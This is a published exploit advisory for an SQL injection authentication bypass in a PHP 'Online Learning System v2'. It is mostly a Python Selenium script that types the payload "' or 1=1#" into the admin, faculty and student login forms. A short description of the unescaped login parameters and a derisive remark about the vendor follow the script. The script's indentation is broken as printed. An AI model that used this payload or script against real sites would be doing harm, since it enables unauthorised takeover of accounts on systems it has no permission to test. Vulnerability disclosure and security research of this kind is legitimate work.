Online Learning System 2 SQL Injection

Online Learning System version 2 suffers from a remote SQL injection vulnerability that allows for authentication bypass.


MD5 | 013bcdc529b93f597062a770fe2ee2b2

### Exploit Title0: eLearning V2(by: oretnom23) is vulnerable from remote
SQL-Injection-Bypass-Authentication in three accounts.
### Author: nu11secur1ty
### Testing and Debugging: nu11secur1ty
### Date: 09.06.2021
### Vendor: https://www.sourcecodester.com/user/257130/activity
### Link:
https://www.sourcecodester.com/php/14929/online-learning-system-v2-using-php-free-source-code.html
### CVE: CVE-nu11-07

[+] Exploit Source:

#!/usr/bin/python3
# Author: @nu11secur1ty
# Debug and Developement: @nu11secur1ty
# CVE-nu11-05

from selenium import webdriver
import time
import os
from colorama import init, Fore, Back, Style
init(convert=True)


#enter the link to the website you want to automate login.
### 0
website_link0="http://localhost/elearning/admin/login.php"

#enter your login username
username0="nu11secur1ty' or 1=1#"

#enter your login password
password0="nu11secur1ty' or 1=1#"

#enter the element for username input field
element_for_username0="username"
#enter the element for password input field
element_for_password0="password"

browser = webdriver.Chrome()
browser.get((website_link0))


try:
### 0
username_element = browser.find_element_by_name(element_for_username0)
username_element.send_keys(username0)
password_element = browser.find_element_by_name(element_for_password0)
password_element.send_keys(password0)
browser.maximize_window()
time.sleep(1)
browser.execute_script("document.querySelector('[class=\"btn btn-primary
btn-block\"]').click()")

time.sleep(5)

### 1
website_link1="http://localhost/elearning/faculty/login.php"

#enter your login username
username1="nu11secur1ty' or 1=1#"

#enter your login password
password1="nu11secur1ty' or 1=1#"

#enter the element for username input field
element_for_username1="faculty_id"
#enter the element for password input field
element_for_password1="password"

browser = webdriver.Chrome()
browser.get((website_link1))


username_element = browser.find_element_by_name(element_for_username1)
username_element.send_keys(username1)
password_element = browser.find_element_by_name(element_for_password1)
password_element.send_keys(password1)
browser.maximize_window()
time.sleep(1)
browser.execute_script("document.querySelector('[class=\"btn btn-primary
btn-block\"]').click()")

time.sleep(5)

### 2
website_link2="http://localhost/elearning/student/login.php"

#enter your login username
username2="nu11secur1ty' or 1=1#"

#enter your login password
password2="nu11secur1ty' or 1=1#"

#enter the element for username input field
element_for_username2="student_id"
#enter the element for password input field
element_for_password2="password"

browser = webdriver.Chrome()
browser.get((website_link2))

username_element = browser.find_element_by_name(element_for_username2)
username_element.send_keys(username2)
password_element = browser.find_element_by_name(element_for_password2)
password_element.send_keys(password2)
browser.maximize_window()
time.sleep(1)
browser.execute_script("document.querySelector('[class=\"btn btn-primary
btn-block\"]').click()")

print(Fore.RED + 'The payload for CVE-nu11-07 is deployed all account is
PWNED by SQL - Injection...\n')
print(Style.RESET_ALL)

except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")

------------------------------------------------------------------

### Description:
The eLearning V2(by: oretnom23) is vulnerable from remote
SQL-Injection-Bypass-Authentication in 3 accounts of the system (admin,
Faculty & Student) in app /elearning/classes/Login.php.
remote SQL-Injection-Bypass-Authentication:
https://portswigger.net/support/using-sql-injection-to-bypass-authentication.

The parameter (username, faculty_id, and student_id) from the login form is
not protected correctly and there is no security and escaping from
malicious payloads.
When the user will sending a malicious query or malicious payload to the
MySQL server for those three accounts, he can bypass the login credentials
and take control of these accounts.

-------------------------------------------------------------------
### CONCLUSION: This vendor must STOP creating all these broken projects
and vulnerable software programs, probably he is not a developer!

### BR
- [+] @nu11secur1ty System Administrator - Infrastructure and Penetration
Testing Engineer

-------------------------------------------------------------------
### Reproduce:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/CVE-nu11-07
### Proof: https://streamable.com/r8pl0l
### BR nu11secur1ty

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://www.exploit-db.com/
https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

Related Posts